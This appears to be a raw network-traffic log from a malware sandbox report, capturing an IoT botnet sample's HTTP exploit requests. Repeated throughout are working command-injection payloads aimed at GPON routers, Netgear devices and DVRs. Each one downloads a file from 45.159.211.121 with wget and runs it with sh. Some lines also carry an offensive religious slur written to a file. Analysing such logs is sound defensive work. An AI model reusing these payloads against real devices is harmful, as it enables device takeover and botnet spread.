Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.7Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.4Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.7Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.7Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.7Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.7Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.7Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.7Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.4Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.5Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.9Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.14Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.9Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.14Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.9Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.14Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.9Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.14Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.9Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.14Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.9Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.14Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.9Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.14Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.135.83.132Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.135.83.132Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.135.83.132Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.135.83.132Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.59Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.59Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.59Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.59Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.59Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.59Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.59Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.119Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.123Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.119Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.123Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.119Connection: close
